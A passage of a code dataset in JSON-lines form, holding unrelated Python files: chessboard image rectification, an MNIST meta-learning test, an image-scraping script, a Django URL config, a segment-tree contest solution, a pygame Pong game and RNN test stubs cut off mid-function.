etc., \n    # tuning should be optimized with this equalization at some point\n    # img = cv2.equalizeHist(img)\n    # clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8,8))\n    # img = clahe.apply(img)\n\n    ##################\n    ## Find initial set of chess lines in image using hough lines & gradient pruning\n    lines_a, lines_b, chess_pts, top_dirs = getChessLinesCorners(img, chessboard_to_screen_ratio = 0.2)\n    if (len(chess_pts) < 4):\n        lines_a, lines_b, chess_pts, top_dirs = getChessLinesCorners(img, chessboard_to_screen_ratio = 0.15)\n    if (len(chess_pts) < 4):\n        lines_a, lines_b, chess_pts, top_dirs = getChessLinesCorners(img, chessboard_to_screen_ratio = 0.3)\n    if (len(chess_pts) == 0):\n        print(\"Couldn't get result for %s, skipping\" % filename)\n        continue\n    elif (len(chess_pts) < 4):\n        print(\"Couldn't get enough chess points: \", lines_a, lines_b, chess_pts, top_dirs)\n        continue\n    chess_pts = chess_pts[np.argsort(chess_pts[:,0]),:] # Sort by y height (row)\n\n    ################## \n    # Find initial guess for chessboard corners and generate rectified image\n    corners = getCorners(chess_pts, top_dirs)\n\n    # Find perspective transform between corners of image to an idealized overhead\n    # We add on two tiles in each direction to account for potential missing lines\n    # (the assumption being the algorithm should be able to find lines within 2 of edge always)\n    # Assume missing up to 4 tiles along an axis\n    warped_img, M = getTileImage(img_orig, corners, tile_buffer=1+4, tile_res=66)\n    M_inv = np.matrix(np.linalg.inv(M))\n\n    ##################\n    # Get full chessboard line set on rectified image\n    lines_x, lines_y, step_x, step_y = getRectifiedChessLines(warped_img)\n    if not len(lines_x) or not len(lines_y):\n        print(\"%s : Skipping, not enough lines in warped image\" % filename)\n        continue\n\n    # Get edges and internal chessboard corners on rectified image\n    warp_corners, all_warp_corners = getRectChessCorners(lines_x, lines_y)\n\n    # Transform from rectified points back to original points for visualization\n    tile_centers = all_warp_corners + np.array([step_x/2.0, step_y/2.0]) # Offset from corner to tile centers\n    real_corners, all_real_tile_centers = getOrigChessCorners(warp_corners, tile_centers, M_inv) \n\n    tile_res = 64 # Each tile has N pixels per side\n    tile_buffer = 1\n    better_warped_img, better_M = getTileImage(img_orig, real_corners, tile_buffer=tile_buffer, tile_res=tile_res)\n    # _, better_M = getTileImage(img_orig, real_corners, tile_buffer=1+4, tile_res=66)\n\n    # Further refine rectified image\n    better_warped_img, was_rotated, refine_M = reRectifyImages(better_warped_img)\n    # combined_M = better_M\n    combined_M = np.matmul(refine_M,better_M)\n\n    if was_rotated:\n        print(\"  tile image was rotated\")\n\n    M_inv = np.matrix(np.linalg.inv(combined_M))\n\n    # Get better_M based corners\n    hlines = vlines = (np.arange(8)+tile_buffer)*tile_res\n    hcorner = (np.array([0,8,8,0])+tile_buffer)*tile_res\n    vcorner = (np.array([0,0,8,8])+tile_buffer)*tile_res\n    ideal_corners = np.vstack([hcorner,vcorner]).T\n    ideal_all_corners = np.array(list(itertools.product(hlines, vlines)))\n    ideal_tile_centers = ideal_all_corners + np.array([tile_res/2.0, tile_res/2.0]) # Offset from corner to tile centers\n    # Get refined real corners\n    real_corners, all_real_tile_centers = getOrigChessCorners(ideal_corners, ideal_tile_centers, M_inv)\n    # Get final refined rectified warped image for saving\n    better_warped_img, _ = getTileImage(img_orig, real_corners, tile_buffer=tile_buffer, tile_res=tile_res)\n\n    print(\"Final transform matrix from image to rectified:\\n\", combined_M)\n\n\n    if SAVE_RECTIFIED:\n        print(\"  Saving tile image to %s\" % output_filename)\n        PIL.Image.fromarray(better_warped_img).save(output_filename)\n\n    if SHOW_PLOTS or SAVE_PLOT:\n        ##################\n        # Plot Top Left Image, initial corner finding setup\n        fig = plt.figure(filename, figsize=(12,8))\n        fig.subplots_adjust(left=0.05,right=.95,bottom=0.05,top=.95)\n        plt.subplot(221,aspect='equal')\n        plt.imshow(img_orig)\n\n        # Lines\n        for idx, line in enumerate(lines_a):\n            x1, y1, x2, y2 = 
line\n plt.plot([x1,x2], [y1,y2],'b', lw=3, alpha=0.5)\n # plt.text(x1, y1-2,'%s' % idx, color='blue', size=8, alpha=0.5);\n for idx, line in enumerate(lines_b):\n x1, y1, x2, y2 = line\n plt.plot([x1,x2], [y1,y2],'g', lw=3, alpha=0.5)\n\n plt.plot(corners[[0,1,2,3,0],0], corners[[0,1,2,3,0],1], 'r', lw=5)\n\n plt.plot(chess_pts[:,0], chess_pts[:,1], 'ro',ms=3) # Points\n # for idx in range(chess_pts.shape[0]):\n # plt.text(chess_pts[idx,0], chess_pts[idx,1]-2,'%d' % idx, color='red', size=8,);\n\n plt.title('Input chess board + overlay initial prediction')\n plt.axis([0,img_orig.size[0],img_orig.size[1], 0])\n\n ##################\n # Plot Top Right: Rectified image + lines\n plt.subplot(222,aspect='equal')\n plt.imshow(warped_img)\n\n # Overlay rectified lines\n for idx, x_pos in enumerate(lines_x):\n plt.plot([x_pos, x_pos], [min(lines_y), max(lines_y)], 'r', lw=4)\n # plt.text(x_pos, min(lines_y)-10,'%d' % idx, color='red', size=10);\n for idx, y_pos in enumerate(lines_y):\n plt.plot([min(lines_x), max(lines_x)], [y_pos, y_pos], 'g', lw=4)\n # plt.text(min(lines_x)-40, y_pos, '%d' % idx, color='green', size=10);\n plt.title('Rectified image and prediction pass #2')\n plt.axis([0,warped_img.shape[1],warped_img.shape[0], 0])\n \n ##################\n # Plot Bottom Left: Overlay original image\n plt.subplot(223,aspect='equal')\n plt.imshow(img_orig)\n\n # plt.plot(real_corners[:,0], real_corners[:,1], 'ro', ms=5)\n # plt.plot(corners[[0,1,2,3,0],0], corners[[0,1,2,3,0],1], 'b', lw=2)\n plt.plot(real_corners[[0,1,2,3,0],0], real_corners[[0,1,2,3,0],1], 'r', lw=7, alpha=0.75)\n plt.plot(all_real_tile_centers[:,0], all_real_tile_centers[:,1], 'gD-',ms=4,lw=2, alpha=0.75)\n # for i in range(all_real_tile_centers.shape[0]):\n # plt.text(all_real_tile_centers[i,0], all_real_tile_centers[i,1], '%d' % i, color='white', size=8);\n\n plt.title('Overlay: Refined tile positions')\n plt.axis([0,img_orig.size[0],img_orig.size[1], 0])\n\n ##################\n # Plot Bottom Right: Updated tile map\n plt.subplot(224,aspect='equal')\n plt.imshow(better_warped_img)\n \n for i in range(1,8):\n ix = (i+tile_buffer)*tile_res\n iy0 = tile_buffer*tile_res\n plt.plot([ix, ix],\n [iy0,(8+tile_buffer)*tile_res],\n 'r', lw=2)\n plt.text(ix-10, iy0-10, '%d' % i, color='white', size=10, fontweight='heavy');\n \n for i in range(1,8):\n iy = (i+tile_buffer)*tile_res\n ix0 = tile_buffer*tile_res\n plt.plot([ix0,(8+tile_buffer)*tile_res],\n [iy, iy],\n 'g', lw=2)\n plt.text(ix0-25, iy+5, '%d' % i, color='white', size=10, fontweight='heavy');\n\n plt.title('Output refined tile map')\n plt.axis([0,better_warped_img.shape[1],better_warped_img.shape[0], 0])\n\n if SAVE_PLOT:\n output_plot_filename = plot_folder+\"/\"+filename[:-3]+\"png\"\n print(\" Saving plot to %s\" % output_plot_filename)\n plt.savefig(output_plot_filename, bbox_inches='tight')\n\nprint(\"Done\")\n\nif SHOW_PLOTS:\n plt.show()\n\n\n######################\n\n# filename = \"%d.jpg\" % 8\n# img_orig = scaleImageIfNeeded(PIL.Image.open(filename))\n\n# # Grayscale\n# img = np.array(img_orig.convert('L')) # grayscale uint8 numpy array\n\n# # Edges\n# # edges = cv2.Canny(img,50,150,apertureSize = 3)\n# edges = cv2.Canny(img,200,500,apertureSize = 3, L2gradient=False) # Better thresholds\n\n# # Gradients\n# sobelx = cv2.Sobel(img,cv2.CV_64F,1,0,ksize=5)\n# sobely = cv2.Sobel(img,cv2.CV_64F,0,1,ksize=5)\n# grad_mag = np.sqrt(sobelx**2+sobely**2)\n\n# # Hough Lines Probabilistic\n\n# chessboard_to_screen_ratio = 0.25\n# min_chessboard_line_length = 
chessboard_to_screen_ratio * min(img.shape)\n# # TODO: This varys based on the chessboard to screen ratio, for chessboards filling the screen, we want to hop further\n# max_line_gap = min_chessboard_line_length / 8.0 * 1.5 # Can hop up to one missing square\n# # line_threshold = int(min_chessboard_line_length * 0.5)\n# print(\"Min Chessboard Line Length: %g\" % min_chessboard_line_length)\n# print(\"Max Line gap: %g\" % max_line_gap)\n# # print(\"Line threshold: %d\" % line_threshold)\n\n# lines = cv2.HoughLinesP(edges,1,np.pi/360.0, 30, minLineLength = min_chessboard_line_length, maxLineGap = max_line_gap)[:,0,:]\n# print(\"Number of lines: %d\" % len(lines))\n\n# fig1 = plt.figure(figsize=(20,8))\n# plt.subplot(121)\n# freqs = np.zeros(lines.shape[0])\n# good_lines = np.zeros(lines.shape[0])\n# edge_ratios = np.zeros(lines.shape[0])\n# norm_grads = np.zeros(lines.shape[0])\n# for idx in range(lines.shape[0]):\n# if idx > 100:\n# break\n# line = lines[idx,:]\n# is_good, strongest_freq, normal_gradients, fft_result, edge_ratio, avg_normal_gradient = getLineGradients(line, sobelx, sobely, grad_mag)\n# freqs[idx] = strongest_freq\n# good_lines[idx] = is_good\n# edge_ratios[idx] = edge_ratio\n# norm_grads[idx] = avg_normal_gradient\n# if is_good:\n# # print(idx, strongest_freq)\n# plt.plot(normal_gradients + idx*2.5)\n# plt.plot([0,600], [idx*2.5, idx*2.5],'k:')\n# plt.text(600-20, idx*2.5 + 0.1,'%s' % idx, color='green', size=8);\n# # plt.text(600-300, idx*2.5 + 0.1,'freq: %s, edge: %.2f' % (strongest_freq, edge_ratio), color='green', size=8);\n# else:\n# plt.plot(normal_gradients + idx*2.5, 'k', alpha=0.25)\n# plt.plot([0,600], [idx*2.5, idx*2.5],'k:',alpha=0.25)\n# plt.text(600-20, idx*2.5 + 0.1,'%s' % idx, color='black', size=8);\n# # plt.text(600-300, idx*2.5 + 0.1,'freq: %s, edge: %.2f' % (strongest_freq, edge_ratio), color='black', size=8);\n\n# print(\"Number of good lines: %d\" % np.sum(good_lines))\n# # Get angles and segment lines up\n# angles = np.zeros(lines.shape[0])\n# for idx in range(lines.shape[0]):\n# line = lines[idx,:]\n# angles[idx] = getSegmentAngle(line)\n\n# segments = segmentAngles(angles, good_lines)\n\n# top_two_segments = chooseBestSegments(segments, norm_grads)\n\n# # Update good_mask to only include top two groups\n# a_segment = segments == top_two_segments[0]\n# b_segment = segments == top_two_segments[1]\n# good_mask = a_segment | b_segment \n\n# a_segment_idxs = np.argwhere(a_segment).flatten()\n# b_segment_idxs = np.argwhere(b_segment).flatten()\n\n# # print(\"segments\",segments)\n# # print(\"top two\", top_two_segments)\n# # print(\"good\", good_lines)\n# # print(\"freq\", freqs)\n# # print(\"edge\", edge_ratios)\n# # print(\"angles\", np.floor(angles*180/np.pi))\n\n# # Plot image\n# plt.subplot(122)\n# plt.imshow(img_orig)\n# # plt.imshow(edges)\n# plt.axis('equal')\n\n# colors = 'krgbykrcmykrgbykcmyk'\n\n# for k in a_segment_idxs:\n# line = lines[k,:]\n# x1, y1, x2, y2 = line\n# plt.plot([x1,x2], [y1,y2],'%s' % colors[segments[k]], lw=2)\n# plt.text(x1, y1-2,'%s' % k, color='blue', size=8);\n\n# for k in b_segment_idxs:\n# line = lines[k,:]\n# x1, y1, x2, y2 = line\n# plt.plot([x1,x2], [y1,y2],'%s' % colors[segments[k]], lw=2)\n# plt.text(x1, y1-2,'%s' % k, color='blue', size=8);\n\n\n\n# for k, [is_good, [x1,y1,x2,y2]] in enumerate(zip(good_mask, lines)):\n# if ~is_good:\n# plt.plot([x1,x2],[y1,y2], 'c', alpha=0.25)\n# plt.text(x1, y1-2,'%s' % k, color='blue', size=8, alpha=0.5);\n\n# # Plot intersections\n# chess_pts = 
getAllLineIntersections(lines[a_segment_idxs], lines[b_segment_idxs])\n# pruned_chess_pts = prunePoints(chess_pts,max_dist2=5**2)\n\n# # plt.plot(pruned_chess_pts[:,0], pruned_chess_pts[:,1], 'go',ms=2)\n\n# better_chess_pts = pruned_chess_pts.copy()\n# criteria = (cv2.TERM_CRITERIA_MAX_ITER + cv2.TERM_CRITERIA_COUNT, 30, 0.01)\n# # better_chess_pts = cv2.cornerSubPix(img, better_chess_pts.astype(np.float32), (4,4), (-1,-1), criteria)\n# plt.plot(better_chess_pts[:,0], better_chess_pts[:,1], 'ro',ms=5)\n# print(\"Have %d points\" % better_chess_pts.shape[0])\n\n# plt.show()","sub_path":"chessboard_detect.py","file_name":"chessboard_detect.py","file_ext":"py","file_size_in_byte":13001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"636024561","text":"import numpy as np\nimport tensorflow as tf\nimport argparse\nfrom models.classifiers import MNISTClassifier\nfrom components.learners import Learner\nimport data.mnist as mnist\n\nparser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nparser.add_argument('--load_params', help='', action='store_true', default=False)\nparser.add_argument('--num_inner_iters', help='', default=10, type=int)\nargs = parser.parse_args()\n\nmeta_train_set, meta_val_set, meta_test_set = mnist.load(data_dir=\"~/scikit_learn_data\", num_classes=5, batch_size=5, split=[5./7, 1./7, 1./7], return_meta=True)\n\n\n\nmodel = MNISTClassifier(num_classes=5, inputs=None, targets=None)\nupdate_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\nwith tf.control_dependencies(update_ops):\n optimizer = tf.train.AdamOptimizer(1e-4).minimize(model.loss)\n\nglobal_init_op = tf.global_variables_initializer()\n\nsaver = tf.train.Saver()\nsave_dir = \"/data/ziz/jxu/hmaml-saved-models\"\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nwith tf.Session(config=config) as sess:\n\n\n acc_arr = []\n for dk in range(20):\n\n sess.run(global_init_op)\n\n if args.load_params:\n ckpt_file = save_dir + '/params_' + \"mnist\" + '.ckpt'\n print('restoring parameters from', ckpt_file)\n saver.restore(sess, ckpt_file)\n\n print(dk, \"resample dataset...\")\n train_set, val_set = meta_train_set.sample_mini_dataset(num_classes=5, num_shots=15, test_shots=5, classes=[0,1,2,3,4])\n\n learner = Learner(session=sess, model=model)\n accs = []\n for epoch in range(args.num_inner_iters):\n # print(epoch, \"......\")\n learner.train(train_set, optimizer)\n evals = learner.evaluate(val_set)\n accs.append(evals[\"accuracy\"])\n acc_arr.append(accs)\n m = np.array(acc_arr)\n\n print(m.mean(0))\n\n\n # train_set, test_set = meta_train_set.sample_mini_dataset(num_classes=5, num_shots=15, test_shots=5, classes=[5,6,7,8,9])\n # learner = Learner(session=sess, model=model)\n # for epoch in range(20):\n # print(epoch, \"......\")\n # learner.train(train_set, optimizer)\n # evals = learner.evaluate(test_set)\n # print(evals)\n\n # saver.save(sess, save_dir + '/params_' + \"mnist\" + '.ckpt')\n","sub_path":"run_meta_mnist_test.py","file_name":"run_meta_mnist_test.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"412246629","text":"import requests\nimport re\nimport lxml\nimport os\nfrom bs4 import BeautifulSoup\nheaer = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Safari/537.36 Core/1.63.6788.400 QQBrowser/10.3.2727.400'\n }\nresponse = 
requests.get('http://www.btshoufa.net/forum-52-1.html').text\npattern = re.compile('(.*?)',re.S)\nresult = re.findall(pattern,response)\nfor li in result:\n url = 'http://www.btshoufa.net/%s'%li[0]\n paths = 'F://%s//'%li[1]\n if os.path.exists(paths) ==False:\n os.makedirs(paths)\n ru = requests.get(url,headers = heaer)\n ru.encoding=ru.apparent_encoding\n rus=ru.text\n soup = BeautifulSoup(rus,'lxml')\n sus = soup.select('.t_f img')\n for i,su in enumerate(sus):\n try:\n ss = su['file']\n rs = requests.get(ss)\n with open(paths+str(i)+'.jpg','wb') as f:\n f.write(rs.content)\n f.close()\n except:\n ''\n finally:\n print('第%d张'%i)\n \nprint('打印完成')\n","sub_path":"很久很久以前写的爬虫代码/爬取bs4图片.py","file_name":"爬取bs4图片.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"142502621","text":"from django.conf.urls import include, url\nfrom webhook_handler import WebHookView\nfrom django.contrib import admin\n\nfrom rest_framework import routers\nimport views\n\n\nrouter = routers.SimpleRouter()\nrouter.register(r'patients', views.PatientViewSet)\nrouter.register(r'appointments', views.AppointmentViewSet)\nrouter.register(r'doctors', views.DoctorViewSet)\nadmin.autodiscover()\n\nurlpatterns = [\n url(r'^setup/$', views.SetupView.as_view(), name='setup'),\n url(r'^welcome/$', views.DoctorWelcome.as_view(), name='welcome'),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^hook/', WebHookView.as_view()),\n url(r'', include('social.apps.django_app.urls', namespace='social')),\n]\nurlpatterns += router.urls\n","sub_path":"drchrono/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"135808239","text":"# input()\n# int(input())\n# map(int, input().split())\n# list(map(int, input().split()))\n# list(map(int, list(input()))) # スペースがない数字リストを読み込み\nimport math\nimport fractions\nimport sys\nimport bisect\nimport heapq # 優先度付きキュー(最小値取り出し)\nimport collections\nfrom collections import Counter\nfrom collections import deque\nimport pprint\n\nsr = lambda: input()\nir = lambda: int(sr())\nlr = lambda: list(map(int, sr().split()))\n\n\"\"\"nを素因数分解\"\"\"\n\"\"\"2以上の整数n => [[素因数, 指数], ...]の2次元リスト\"\"\"\n\n\ndef factorization(n):\n arr = []\n temp = n\n if n == 1:\n return arr\n\n for i in range(2, int(-(-n ** 0.5 // 1)) + 1):\n if temp % i == 0:\n cnt = 0\n while temp % i == 0:\n cnt += 1\n temp //= i\n arr.append([i, cnt])\n\n if temp != 1:\n arr.append([temp, 1])\n\n if arr == []:\n arr.append([n, 1])\n\n return arr\n\n\n# a^n\ndef power(a, n, mod):\n x = 1\n while n:\n if n & 1:\n x *= a % mod\n n >>= 1\n a *= a % mod\n return x % mod\n\n\n# n*(n-1)*...*(l+1)*l\ndef kaijo(n, l, mod):\n if n == 0:\n return 1\n a = n\n tmp = n - 1\n while (tmp >= l):\n a = a * tmp % mod\n tmp -= 1\n return a\n\n\ninf = 10 ** 18\nmod = 10 ** 9 + 7\n\n\n# segment tree\n\nclass SegmentTree:\n # 初期化処理\n # f : SegmentTree��のせるモノイド\n # default : fに対する単位元\n def __init__(self, size, f=lambda x, y: x + y, default=0):\n self.size = 2 ** (size - 1).bit_length() # 簡単のため要素数Nを2冪にする\n self.default = default\n self.dat = [default] * (self.size * 2) # 要素を単位元で初期化\n self.f = f\n\n def update(self, i, x):\n i += self.size\n self.dat[i] = x\n while i > 0:\n i >>= 1\n self.dat[i] = self.f(self.dat[i * 2], self.dat[i * 2 + 1])\n\n def query(self, l, r):\n l += self.size\n r += self.size\n lres, rres = self.default, self.default\n while l < 
r:\n            if l & 1:\n                lres = self.f(lres, self.dat[l])\n                l += 1\n\n            if r & 1:\n                r -= 1\n                rres = self.f(self.dat[r], rres)  # commutativity is not guaranteed for a monoid, so mind the direction of the operation\n            l >>= 1\n            r >>= 1\n        res = self.f(lres, rres)\n        return res\n\n\nn = ir()\na = lr()\nseg1 = SegmentTree(n, lambda x, y: x + y, 0)\nseg2 = SegmentTree(n, lambda x, y: x + y, 0)\nfor i, num in enumerate(a):\n    seg1.update(i, num)  # update the i-th element (0-origin) to num, O(n)\n    seg2.update(i, num)  # update the i-th element (0-origin) to num, O(n)\nans1 = 0\nans2 = 0\npflag = True\npflag2 = False\nfor i in range(1,n+1):\n    now1 = seg1.query(0,i)\n    if pflag and now1 <= 0:\n        seg1.update(i-1, a[i-1]-now1+1)\n        ans1+=(1-now1)\n    elif (not pflag) and now1 >= 0:\n        seg1.update(i-1, a[i-1]-now1-1)\n        ans1+=(now1+1)\n    now2 = seg2.query(0,i)\n    if pflag2 and now2 <= 0:\n        seg2.update(i-1, a[i-1]-now2+1)\n        ans2+=(1-now2)\n    elif (not pflag2) and now2 >= 0:\n        seg2.update(i-1, a[i-1]-now2-1)\n        ans2+=(now2+1)\n    pflag = not pflag\n    pflag2 = not pflag2\nprint(min(ans1,ans2))\n","sub_path":"Python_codes/p03739/s253002076.py","file_name":"s253002076.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"619195781","text":"\"\"\" File grouping all the classes of our game:\n    - Raquette (paddle)\n    - Balle (ball) \"\"\"\nimport pygame\nfrom pygame.locals import *\nfrom constantes import *\nfrom random import randint\n\nclass Raquette:\n    def __init__(self, x):\n        self.x = x\n        self.y = 295\n        self.direction = RIEN\n        self.image = pygame.image.load(\"Img/raquette.png\").convert_alpha()\n        self.rect = Rect((self.x, self.y), (largeurP, hauteurP))\n    def moove(self, fenetre, direction):\n        if self.direction == HAUT and self.y > 0:\n            self.y -= VITESSE_RAQUETTE\n        if self.direction == BAS and self.y < hauteurE - hauteurP:\n            self.y += VITESSE_RAQUETTE\n    def collide(self, balle):\n        if self.rect.colliderect(balle) == True:\n            return True\n\nclass Balle:\n    def __init__(self, ecran: pygame.surface):\n        self.image = pygame.image.load(\"Img/balle.png\").convert_alpha()\n        self.x = (largeurE/2) - 10\n        self.y = (hauteurE/2) - 10\n        self.vect = [VITESSE_BALLE, -VITESSE_BALLE]\n        self.rect = Rect((self.x, self.y), (20,20))\n        self.ecran = ecran\n    def refresh(self, raquette1, raquette2):\n        if raquette1.collide(self.rect) == True :\n            self.vect[0] = -self.vect[0] + (randint(100,180) / 1000)  # reflect the speed, not the position\n            self.vect[1] += (randint(100,180) / 1000) \n        if raquette2.collide(self.rect) == True :\n            self.vect[1] = -self.vect[1] + (randint(100,180) / 1000)\n            self.vect[0] += (randint(100,180) / 1000) \n        if self.y < 0 or self.y > hauteurE - 20:\n            self.vect[1] = -self.vect[1]  # bounce off the top/bottom edges\n        self.x += self.vect[0]\n        self.y += self.vect[1]\n        self.ecran.blit(self.image, (self.x, self.y))\n        self.ecran.blit(raquette1.image, (raquette1.x, raquette1.y))\n        self.ecran.blit(raquette2.image, (raquette2.x, raquette2.y))\n\nclass Game:\n    def prepare(self, balle):\n        \"\"\"Method that resets everything to 0 when needed\"\"\"\n        balle.vect = [VITESSE_BALLE, -VITESSE_BALLE]\n        balle.x = (largeurE/2) - 10\n        balle.y = (hauteurE/2) - 10\n        score_1 = 0\n        score_2 = 0\n","sub_path":"classe.py","file_name":"classe.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"352707898","text":"from Node import Node\nfrom Tree import Tree\nfrom utilities import *\nimport numpy as np\nimport pickle\nfrom Model import Model\nfrom unittest import TestCase\n\nnp.random.seed(43)\n\n\nclass RNNBranchCoverage:\n    def Stub_validate(self, RNN):\n        RNN.tree_val = np.array([2])\n        val_cost = 0\n        x = RNN.tree_val[0]\n        for t in RNN.tree_val:\n            tree = RNN.trees[t]\n            RNN.calc_outputs(tree)\n            val_cost += RNN.get_cost(tree)\n\n        return val_cost\n\n    def Stub_check_model_veracity(self, RNN):\n        output = []\n        RNN.epochs = 1\n        RNN.tree_train = (2, 10)\n        delta_w = np.zeros(RNN.w.shape)\n        delta_ws = np.zeros(RNN.ws.shape)\n        for i in xrange(RNN.epochs):\n            numgrad = None\n            for t in RNN.tree_train:\n                tree = RNN.trees[t]\n                RNN.calc_outputs(tree)\n                RNN.calc_errors(tree, delta_w, delta_ws)\n                if numgrad is not None:\n                    numgrad += RNN.numerical_gradient(tree)\n                else:\n                    numgrad = RNN.numerical_gradient(tree)\n\n            scale = 1. / len(RNN.tree_train)\n            numgrad *= scale\n            RNN.scale_regularize(delta_w, delta_ws, scale)\n            grad = RNN.get_gradients(delta_w, delta_ws)\n            output.append(np.around(np.sum(np.abs(grad - numgrad) / np.abs(grad + numgrad)), 10))\n\n            RNN.update(delta_w, delta_ws)\n            delta_w.fill(0)\n            delta_ws.fill(0)\n\n        return output\n\n    def Stub_cross_validate(self, RNN, num_folds=1):\n        size = len(RNN.trees)\n        folds = size // num_folds * np.ones(num_folds, dtype=np.int)\n        folds[:size % num_folds] += 1\n        indices = np.arange(0, size)\n        np.random.shuffle(indices)\n        np.random.shuffle(RNN.trees)\n\n        current = 0\n        accuracies = np.zeros(num_folds)\n        for i, fold in enumerate(folds):\n            # Assign training and test sets\n            start, stop = current, current + fold\n            RNN.tree_test = indices[start:stop]\n            RNN.tree_train = np.concatenate((indices[:start], indices[stop:]), axis=0)\n            current = stop\n\n            # perform training\n            '''\n            Irrelevant for branch coverage as it takes up a lot of time\n            RNN.train()\n            _, accuracies[i], _ = RNN.test()\n            RNN.reset_weights()\n            '''\n        return np.mean(accuracies)\n\n    def Stub_test(self, RNN):\n        RNN.tree_test = np.array([4, 10])\n        test_cost = 0\n        correct = 0\n        incorrect = []\n        for t in RNN.tree_test:\n            tree = RNN.trees[t]\n            RNN.calc_outputs(tree)\n            test_cost += RNN.get_cost(tree)\n            tree.pred_label = np.argmax(tree.predictions)\n            true_label = np.where(tree.target == 1)[0]\n            if true_label == tree.pred_label:\n                correct += 1\n            else:\n                incorrect.append(tree.id)\n\n        return 1. 
* correct / len(RNN.tree_test)\n\n # stub forward#1\n def Stub1_forward(self, node, RNN):\n \"\"\"\n Checks true/false for first two and true for the third\n \"\"\"\n\n if node.num_child == 0:\n return node.vec\n\n elif node.num_child == 1:\n return np.tanh(node.children[0].vec)\n\n elif node.num_child == 2:\n # setting number of children of left child to 1 to check true of the second condition\n node.children[0].num_child = 1\n left = RNN.forward(node.children[0])\n node.children[0].num_child = 0\n right = RNN.forward(node.children[1])\n children = concat_with_bias(left, right)\n\n node.vec = np.tanh(np.dot(RNN.w, children))\n\n return node.vec\n\n # stub forward#2\n\n def Stub2_forward(self, node, RNN):\n # For getting False from the third condition\n node.num_child = 3\n\n if node.num_child == 0:\n return node.vec\n\n elif node.num_child == 1:\n return np.tanh(node.children[0].vec)\n\n elif node.num_child == 2:\n left = RNN.forward(node.children[0])\n right = RNN.forward(node.children[1])\n children = concat_with_bias(left, right)\n\n node.vec = np.tanh(np.dot(RNN.w, children))\n\n return node.vec\n\n def Stub1_back_prop(self, RNN, node, delta_com, delta_w, delta_ws):\n \"\"\"\n Checks true/false for first two and true for the third\n \"\"\"\n\n if node.num_child == 0:\n # TODO: take word vector derivatives\n return\n elif node.num_child == 1:\n return\n elif node.num_child == 2:\n node.children[0].num_child = 1\n left_vector = node.children[0].vec\n node.children[1].num_child = 0\n right_vector = node.children[0].vec\n # [x3, p1]\n\n # concatenate with bias here\n children = concat_with_bias(left_vector, right_vector)\n\n # delta_w = delta_com * [x3, p1]\n delta_w += np.dot(delta_com, children.T)\n\n # W.T * delta_com * f'([x3, p1])\n delta_down = np.multiply(np.dot(RNN.w.T, delta_com), tanh_derivative(children))\n\n left_delta_down = delta_down[:RNN.dim]\n right_delta_down = delta_down[RNN.dim: 2 * RNN.dim]\n\n RNN.back_prop(node.children[0], left_delta_down, delta_w, delta_ws)\n RNN.back_prop(node.children[1], right_delta_down, delta_w, delta_ws)\n\n def Stub2_back_prop(self, RNN, node, delta_com, delta_w, delta_ws):\n \"\"\"\n Checks false for third condition\n \"\"\"\n node.num_child = 3\n\n if node.num_child == 0:\n # TODO: take word vector derivatives\n return\n elif node.num_child == 1:\n return\n elif node.num_child == 2:\n node.children[0].num_child = 1\n left_vector = node.children[0].vec\n node.children[1].num_child = 0\n right_vector = node.children[1].vec\n # [x3, p1]\n\n # concatenate with bias here\n children = concat_with_bias(left_vector, right_vector)\n\n # delta_w = delta_com * [x3, p1]\n delta_w += np.dot(delta_com, children.T)\n\n # W.T * delta_com * f'([x3, p1])\n delta_down = np.multiply(np.dot(RNN.w.T, delta_com), tanh_derivative(children))\n\n left_delta_down = delta_down[:RNN.dim]\n right_delta_down = delta_down[RNN.dim: 2 * RNN.dim]\n\n RNN.back_prop(node.children[0], left_delta_down, delta_w, delta_ws)\n RNN.back_prop(node.children[1], right_delta_down, delta_w, delta_ws)\n\n def Stub_numerical_gradient(self, RNN, tree):\n \"\"\"\n Checks the only condition in the for loop\n \"\"\"\n\n epsilon = 1e-5\n initial_params = RNN.get_params()\n RNN.set_params(initial_params)\n l = len(initial_params)\n\n # To run the loop only once\n l = 1\n\n vector = np.zeros(initial_params.shape)\n exp_grad = np.zeros(initial_params.shape)\n\n for i in range(l):\n vector[i] = epsilon\n\n RNN.set_params(initial_params + vector)\n RNN.calc_outputs(tree)\n c_plus = 
RNN.get_cost(tree)\n\n RNN.set_params(initial_params - vector)\n RNN.calc_outputs(tree)\n c_minus = RNN.get_cost(tree)\n\n exp_grad[i] = (c_plus - c_minus) / (2 * epsilon)\n\n vector[i] = 0\n\n RNN.set_params(initial_params)\n\n return exp_grad\n\n def Stub1_train(self, RNN, is_val=True):\n \"\"\"\n\n \"\"\"\n # error derivatives with respect to parameters\n delta_w = np.zeros(RNN.w.shape)\n delta_ws = np.zeros(RNN.ws.shape)\n train_cost = 0\n\n # early stopping parameters\n min_cost = np.inf\n max_count = 30\n count_down = max_count\n error_factor = 0.0001\n train_size = len(RNN.tree_train)\n\n # best set of parameters\n w_best = None\n ws_best = None\n\n RNN.epochs = 1\n\n for i in xrange(RNN.epochs):\n # Shuffle training set and create mini batches\n np.random.shuffle(RNN.tree_train)\n mini_batches = [RNN.tree_train[i:min(i + RNN.mini_batch, train_size)]\n for i in xrange(0, train_size, RNN.mini_batch)]\n # run SGD for each mini batch\n mini_batches = [[123]]\n for mini_batch in mini_batches:\n train_cost = 0\n for t in 